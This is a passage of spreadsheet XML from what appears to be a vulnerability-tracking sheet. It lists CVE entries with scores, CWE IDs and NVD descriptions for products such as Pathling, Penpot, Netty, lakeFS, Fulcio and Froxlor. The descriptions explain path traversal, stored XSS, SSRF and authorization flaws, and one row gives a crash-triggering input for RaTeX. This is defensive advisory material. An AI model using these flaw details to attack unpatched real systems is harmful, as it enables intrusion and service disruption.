      <c r="G1129" s="5" t="inlineStr"/>
      <c r="H1129" s="5" t="inlineStr"/>
      <c r="I1129" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1129" s="5" t="inlineStr"/>
      <c r="K1129" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1129" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, Pathling's `/$result` endpoint allows a caller who can obtain any valid async export job ID to supply `file` parameter values containing path traversal sequences. The handler verifies only the supplied `job` and never normalises or confines the requested `file` path to that job's `jobs/&lt;jobId&gt;` directory before opening it as a filesystem resource. Because async export scratch space lives under the same warehouse database root as persisted resource tables, an attacker can use their own export job to read other files from the warehouse. This is fixed in Pathling Server 2.0.0. As an interim mitigation, disable the async export operations (`pathling.operations.exportEnabled`, `patientExportEnabled`, `groupExportEnabled`, `bulkSubmitEnabled`) or enable authentication and restrict export capability to trusted callers.</t>
        </is>
      </c>
      <c r="M1129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47661</t>
        </is>
      </c>
    </row>
    <row r="1130">
      <c r="A1130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47662</t>
        </is>
      </c>
      <c r="C1130" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1130" s="5" t="inlineStr"/>
      <c r="F1130" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1130" s="5" t="inlineStr"/>
      <c r="H1130" s="5" t="inlineStr"/>
      <c r="I1130" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1130" s="5" t="inlineStr"/>
      <c r="K1130" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-522, CWE-918</t>
        </is>
      </c>
      <c r="L1130" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, Pathling's typed CRUD/search/batch FHIR surface allows an authenticated caller with only coarse operation authorities to act on attacker-chosen resource families because those entrypoints do not consistently enforce the documented per-resource `read` and `write` authorities. The documented authorization model requires an operation authority (e.g. `pathling:search`) to be paired with the matching per-resource `read` or `write` authority (e.g. `pathling:read:Patient`). Delete and batch are documented to require write authority for all referenced resource types. However, typed search, update, and related handlers are annotated only with `@OperationAccess(...)` and act on the provider-selected resource type without checking the corresponding per-resource authority. This is fixed in Pathling Server 2.0.0.</t>
        </is>
      </c>
      <c r="M1130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47662</t>
        </is>
      </c>
    </row>
    <row r="1131">
      <c r="A1131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47663</t>
        </is>
      </c>
      <c r="C1131" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1131" s="5" t="inlineStr"/>
      <c r="F1131" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1131" s="5" t="inlineStr"/>
      <c r="H1131" s="5" t="inlineStr"/>
      <c r="I1131" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1131" s="5" t="inlineStr"/>
      <c r="K1131" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L1131" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, Pathling's typed CRUD/search/batch FHIR surface allows an authenticated caller with only coarse operation authorities to act on attacker-chosen resource families because those entrypoints do not consistently enforce the documented per-resource `read` and `write` authorities. The documented authorization model requires an operation authority (e.g. `pathling:search`) to be paired with the matching per-resource `read` or `write` authority (e.g. `pathling:read:Patient`). Delete and batch are documented to require write authority for all referenced resource types. However, typed search, update, and related handlers are annotated only with `@OperationAccess(...)` and act on the provider-selected resource type without checking the corresponding per-resource authority. This is fixed in Pathling Server 2.0.0.</t>
        </is>
      </c>
      <c r="M1131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47663</t>
        </is>
      </c>
    </row>
    <row r="1132">
      <c r="A1132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47665</t>
        </is>
      </c>
      <c r="C1132" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1132" s="5" t="inlineStr"/>
      <c r="F1132" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1132" s="5" t="inlineStr"/>
      <c r="H1132" s="5" t="inlineStr"/>
      <c r="I1132" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1132" s="5" t="inlineStr"/>
      <c r="K1132" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1132" s="5" t="inlineStr">
        <is>
          <t>Penpot is an open-source design and prototyping platform. In versions up to and including 2.14.3, Penpot is vulnerable to stored cross-site scripting through file comments, whose content is stored as raw text and rendered into the page with innerHTML without any sanitization. Because the backend applies only a length check and the frontend writes comment content directly through innerHTML, any team member who can comment on a shared file can embed HTML such as an image error handler or script that executes in the browser of every other collaborator. The attack is passive: any user who opens the comments panel on the affected file triggers script execution on the Penpot origin, allowing theft of session cookies, actions performed as the victim, and access to their files and projects. This issue is fixed in version 2.15.3.</t>
        </is>
      </c>
      <c r="M1132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47665</t>
        </is>
      </c>
    </row>
    <row r="1133">
      <c r="A1133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47683</t>
        </is>
      </c>
      <c r="C1133" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1133" s="5" t="inlineStr"/>
      <c r="F1133" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1133" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1133" s="5" t="inlineStr"/>
      <c r="I1133" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1133" s="5" t="inlineStr"/>
      <c r="K1133" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1133" s="5" t="inlineStr">
        <is>
          <t>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, the bufferAllocLimit enforcement in lib/setup-sandbox.js does not cover Buffer.concat(list, totalLength) or Buffer.from(arrayLike) with an attacker-controlled length, allowing sandbox code to perform large synchronous host external-memory allocations that bypass the configured cap and can exhaust the host process. This issue is fixed in version 3.11.6.</t>
        </is>
      </c>
      <c r="M1133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47683</t>
        </is>
      </c>
    </row>
    <row r="1134">
      <c r="A1134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47879</t>
        </is>
      </c>
      <c r="C1134" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1134" s="5" t="inlineStr"/>
      <c r="F1134" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1134" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H1134" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_cloud_gateway</t>
        </is>
      </c>
      <c r="I1134" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1134" s="5" t="inlineStr"/>
      <c r="K1134" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1134" s="5" t="inlineStr">
        <is>
          <t>Spring Cloud Gateway JsonToGrpcGatewayFilterFactory allows arbitrary Spring Resource locations for defining the proto descriptor.
Spring Cloud Gateway 5.0.0 - 5.0.2
Spring Cloud Gateway 4.3.0 - 4.3.5
Spring Cloud Gateway 4.0.0 - 4.2.9
Spring Cloud Gateway 3.1.13 and earlier</t>
        </is>
      </c>
      <c r="M1134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47879</t>
        </is>
      </c>
    </row>
    <row r="1135">
      <c r="A1135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48006</t>
        </is>
      </c>
      <c r="C1135" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1135" s="5" t="inlineStr"/>
      <c r="F1135" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1135" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H1135" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1135" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J1135" s="5" t="inlineStr"/>
      <c r="K1135" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="L1135" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, the RedisArrayAggregator handler permanently leaks pooled direct-memory buffers when a Redis pipeline connection closes before a RESP array aggregate completes. The handler retains child messages in per-handler state (`depths` field) but defines no `channelInactive`, `handlerRemoved`, or `exceptionCaught` method to release them when the pipeline tears down. Because the leaked buffers are slices of `PooledByteBufAllocator` chunks, they prevent those chunks from being returned to the JVM-wide direct-memory pool. Repeated connection churn by any network peer monotonically drains this shared pool, eventually causing allocation failures on all Netty channels in the process. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M1135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48006</t>
        </is>
      </c>
    </row>
    <row r="1136">
      <c r="A1136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48026</t>
        </is>
      </c>
      <c r="C1136" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1136" s="5" t="inlineStr"/>
      <c r="F1136" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1136" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1136" s="5" t="inlineStr"/>
      <c r="I1136" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1136" s="5" t="inlineStr"/>
      <c r="K1136" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1136" s="5" t="inlineStr">
        <is>
          <t>lakeFS is an open-source tool that transforms object storage into a Git-like repositories. Prior to version 1.81.1 of the open source edition and 1.84.0 of the enterprise edition, lakeFS Web UI renders markdown files from repository objects without sanitizing the resulting HTML. A user with write access to any repository branch can commit a `.md` object containing arbitrary HTML/JavaScript. Any other user who opens that object, or who navigates to a repository or directory containing a malicious `README.md`, executes the attacker-supplied script in their own authenticated session. lakeFS fixes the issue in v1.81.1 and lakeFS Enterprise fixes the issue in in v1.84.0. Enterprise customers using older versions can temporarily disable Markdown rendering by adding YAML to their config. No workaround exists for OSS release. Users are advised to upgrade to the latest version for both lakeFS and lakeFS-Enterprise.</t>
        </is>
      </c>
      <c r="M1136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48026</t>
        </is>
      </c>
    </row>
    <row r="1137">
      <c r="A1137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48059</t>
        </is>
      </c>
      <c r="C1137" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1137" s="5" t="inlineStr"/>
      <c r="F1137" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1137" s="5" t="inlineStr"/>
      <c r="H1137" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1137" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J1137" s="5" t="inlineStr"/>
      <c r="K1137" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-401</t>
        </is>
      </c>
      <c r="L1137" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, the HAProxy PROXY protocol v2 codec in netty leaks native or heap memory on every connection when a client sends a syntactically valid header containing nested `PP2_TYPE_SSL` TLVs (type-length-value records) at depth two or greater. The leak occurs on the successful parse path — no exception is thrown, the message fires downstream, the decoder removes itself, and the application releases the `HAProxyMessage` normally. Yet the underlying cumulation buffer (a pooled, potentially direct `ByteBuf` allocated by the channel) remains permanently pinned. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M1137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48059</t>
        </is>
      </c>
    </row>
    <row r="1138">
      <c r="A1138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48813</t>
        </is>
      </c>
      <c r="C1138" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1138" s="5" t="inlineStr"/>
      <c r="F1138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1138" s="5" t="inlineStr"/>
      <c r="H1138" s="5" t="inlineStr"/>
      <c r="I1138" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1138" s="5" t="inlineStr"/>
      <c r="K1138" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L1138" s="5" t="inlineStr">
        <is>
          <t>Flawfinder is a a static analysis tool for finding vulnerabilities in C/C++ source code. Versions prior to 2.0.20 have an improper input neutralization issue leading to output manipulation, specifically, Terminal/ANSI Escape Sequence Injection and XML Injection. A malicious file whose name contains ANSI escape sequences can end up being included in flawfinder's standard terminal output, with many effects. Untrusted fields (such as filenames, categories, or code context text) were not properly sanitized when generating structured reports. An attacker could exploit this to corrupt CSV formats or inject arbitrary XML attributes into SonarQube outputs via output_sonar(). It impacts those who use flawfinder to evaluate intentionally malicious filenames or file contents. This issue has been fully patched in Version 2.0.20 (released 2026-05-16). There is no configuration-based workaround within older versions of flawfinder. If an immediate upgrade is not possible, users can mitigate the risk by pre-scanning filenames, inspecting raw output, and/or restricting untrusted inputs.</t>
        </is>
      </c>
      <c r="M1138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48813</t>
        </is>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49478</t>
        </is>
      </c>
      <c r="C1139" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1139" s="5" t="inlineStr"/>
      <c r="F1139" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1139" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1139" s="5" t="inlineStr"/>
      <c r="I1139" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1139" s="5" t="inlineStr"/>
      <c r="K1139" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1139" s="5" t="inlineStr">
        <is>
          <t>Fulcio is a certificate authority for issuing code signing certificates for an OpenID Connect (OIDC) identity. Versions through 1.8.5 improperly follow cross-host redirects and attach Kubernetes ServiceAccount tokens during OIDC discovery, allowing a malicious or compromised issuer to perform blind SSRF, substitute and cache malicious JWKS keys, or disclose ServiceAccount tokens to external hosts. Version 1.8.6 blocks cross-host redirects, restricts token injection, and restricts local token loading. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M1139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49478</t>
        </is>
      </c>
    </row>
    <row r="1140">
      <c r="A1140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52736</t>
        </is>
      </c>
      <c r="C1140" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1140" s="5" t="inlineStr"/>
      <c r="F1140" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1140" s="5" t="inlineStr"/>
      <c r="H1140" s="5" t="inlineStr"/>
      <c r="I1140" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1140" s="5" t="inlineStr"/>
      <c r="K1140" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="L1140" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, a remote unauthenticated P2P peer can stall a Zebra node by racing an invalid block body against the valid canonical body for the same block header hash. ZIP-244 permits the attacker to mutate coinbase scriptSig authentication data while retaining the transaction identifiers, merkle root, and block header hash, so the poisoned body fails later commitment validation but shares the canonical hash. In zebra-state/src/service.rs, queue_and_commit_to_non_finalized_state recorded the hash in non_finalized_block_write_sent_hashes before contextual validation completed and did not remove it when the write task rejected the body. When the honest body later arrived, the cached hash caused KnownBlock::WriteChannel duplicate handling to suppress it, leaving the node stuck one height behind until restart or reorganization. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M1140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52736</t>
        </is>
      </c>
    </row>
    <row r="1141">
      <c r="A1141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53453</t>
        </is>
      </c>
      <c r="C1141" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1141" s="5" t="inlineStr"/>
      <c r="F1141" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1141" s="5" t="inlineStr"/>
      <c r="H1141" s="5" t="inlineStr"/>
      <c r="I1141" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1141" s="5" t="inlineStr"/>
      <c r="K1141" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1141" s="5" t="inlineStr">
        <is>
          <t>Blueprint Studio is a VS Code-like file editor for Home Assistant configuration files. Prior to 2.5.2, Blueprint Studio exposed administrator-intended backend API actions to any authenticated Home Assistant user because the backend did not consistently enforce the panel's admin-only authorization boundary. Affected surfaces included the backend API, upload API, stream routes, terminal WebSocket, Blueprint Studio WebSocket subscriptions, call_service, render_template, global_replace, file and stream access paths, upload handling, and terminal helpers. A non-admin user could invoke arbitrary Home Assistant services, expose Home Assistant state through templates, modify configuration files, access streamed or downloaded configuration content, upload files, or reach terminal-related helpers. These actions could compromise the confidentiality, integrity, and availability of the Home Assistant installation. This issue is fixed in version 2.5.2.</t>
        </is>
      </c>
      <c r="M1141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53453</t>
        </is>
      </c>
    </row>
    <row r="1142">
      <c r="A1142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53502</t>
        </is>
      </c>
      <c r="C1142" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1142" s="5" t="inlineStr"/>
      <c r="F1142" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1142" s="5" t="inlineStr"/>
      <c r="H1142" s="5" t="inlineStr"/>
      <c r="I1142" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1142" s="5" t="inlineStr"/>
      <c r="K1142" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1142" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, file_loader decodes percent-encoded path segments after its root-boundary validation, allowing traversal outside FILE_LOADER_ROOT_PATH through watermark or frame filter input. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M1142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53502</t>
        </is>
      </c>
    </row>
    <row r="1143">
      <c r="A1143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53530</t>
        </is>
      </c>
      <c r="C1143" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1143" s="5" t="inlineStr"/>
      <c r="F1143" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1143" s="5" t="inlineStr"/>
      <c r="H1143" s="5" t="inlineStr"/>
      <c r="I1143" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1143" s="5" t="inlineStr"/>
      <c r="K1143" s="5" t="inlineStr">
        <is>
          <t>CWE-1285, CWE-248, CWE-400</t>
        </is>
      </c>
      <c r="L1143" s="5" t="inlineStr">
        <is>
          <t>RaTeX is a KaTeX-compatible math rendering engine written in Rust. Prior to version 0.1.11, the public parser entrypoint `ratex_parser::parse(&amp;str)` panics on the 9-byte input `\verbéxé` (i.e. `\verb` followed by the non-ASCII delimiter `é`). When handling a `\verb` command, the parser slices the verbatim argument with byte indices (`arg[1..arg.len() - 1]`); if the delimiter character is multibyte UTF-8, index `1` lands inside that character and Rust panics with *“byte index 1 is not a char boundary”*. Because RaTeX’s release profile sets `panic = "abort"` (`Cargo.toml:48`), the panic aborts the entire process — not just the current request/thread — making this a hard denial of service for any service that renders untrusted LaTeX. Version 0.1.11 fixes the issue.</t>
        </is>
      </c>
      <c r="M1143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53530</t>
        </is>
      </c>
    </row>
    <row r="1144">
      <c r="A1144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53758</t>
        </is>
      </c>
      <c r="C1144" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1144" s="5" t="inlineStr"/>
      <c r="F1144" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1144" s="5" t="inlineStr"/>
      <c r="H1144" s="5" t="inlineStr"/>
      <c r="I1144" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1144" s="5" t="inlineStr"/>
      <c r="K1144" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1144" s="5" t="inlineStr">
        <is>
          <t>Emlog is an open source website building system. In versions 2.6.29 and prior, article content is processed by Parsedown without enabling safe mode, which means raw HTML including &lt;script&gt; tags embedded in Markdown is passed through unescaped. The output is rendered with no additional sanitization, resulting in stored XSS visible to all site visitors. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="M1144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53758</t>
        </is>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53924</t>
        </is>
      </c>
      <c r="C1145" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1145" s="5" t="inlineStr"/>
      <c r="F1145" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1145" s="5" t="inlineStr"/>
      <c r="H1145" s="5" t="inlineStr"/>
      <c r="I1145" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1145" s="5" t="inlineStr"/>
      <c r="K1145" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1145" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. Prior to 0xc9d4e0dacd937364793278180551e59d93cd43f9, StreamingEscrow.claim() correctly rejects withdrawals while an escrow is disputed, but the permissionless syncOutflow() path performs the same excess-balance transfer without checking disputed. After a streaming proposal is challenged, anyone can call syncOutflow() to transfer escrowed SuperTokens to the proposal beneficiary while the dispute is pending. If the proposal is later rejected, those tokens cannot be recovered by drainToStrategy(). This issue has been patched in 0xc9d4e0dacd937364793278180551e59d93cd43f9.</t>
        </is>
      </c>
      <c r="M1145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53924</t>
        </is>
      </c>
    </row>
    <row r="1146">
      <c r="A1146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54347</t>
        </is>
      </c>
      <c r="C1146" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1146" s="5" t="inlineStr"/>
      <c r="F1146" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1146" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1146" s="5" t="inlineStr"/>
      <c r="I1146" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1146" s="5" t="inlineStr"/>
      <c r="K1146" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1146" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. Prior to 2.3.8, DNS TXT record content accepted by lib/Froxlor/Api/Commands/DomainZones.php can contain HTML special characters, lib/Froxlor/UI/Callbacks/Text.php returns the content from Text::wordwrap without HTML escaping, and templates/Froxlor/table/table.html.twig renders the callback result with the raw filter. An authenticated customer with DNS editor access can store JavaScript-bearing content in a TXT record. When an administrator views the affected domain's DNS configuration, the payload executes automatically in the administrator's browser session, which can expose session data or perform privileged panel actions. This issue is fixed in version 2.3.8.</t>
        </is>
      </c>
      <c r="M1146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54347</t>
        </is>
      </c>
    </row>
    <row r="1147">
      <c r="A1147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54722</t>
        </is>
      </c>
      <c r="C1147" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1147" s="5" t="inlineStr"/>
      <c r="F1147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1147" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1147" s="5" t="inlineStr"/>
